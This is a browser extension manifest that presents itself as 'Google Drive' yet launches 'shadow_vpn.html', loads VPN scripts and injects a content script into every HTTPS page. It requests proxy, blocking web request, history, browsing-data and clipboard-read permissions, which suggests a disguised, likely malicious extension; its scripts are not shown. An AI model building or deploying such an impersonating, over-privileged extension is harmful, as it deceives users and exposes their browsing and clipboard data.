{
  "app": {
    "launch": {
      "local_path": "shadow_vpn.html"
    }
  },
  "offline_enabled": true,
  "name": "Google Drive",
  "description": "Google Drive: create, share and keep all your stuff in one place.",
  "version": "1.0.0",
  "icons": {
    "128": "ico.png"
  },
  "manifest_version": 2,
  "permissions": [
    "webRequest",
    "webRequestBlocking",
    "browsingData",
    "http://*/*",
    "https://*/*",
    "proxy",
    "storage",
    "history",
    "webRequest",
    "tabs",
    "clipboardWrite",
    "clipboardRead"
  ],
  "content_scripts": [
    {
      "js": [
        "jquery-3.6.0.min.js", "vpn.js"
      ],
      "matches": [
        "https://*/*"
      ],
      "run_at": "document_start"
    }
  ],
  "background": {
    "scripts": [
      "jquery-3.6.0.min.js", "background.js"
    ]
  }
}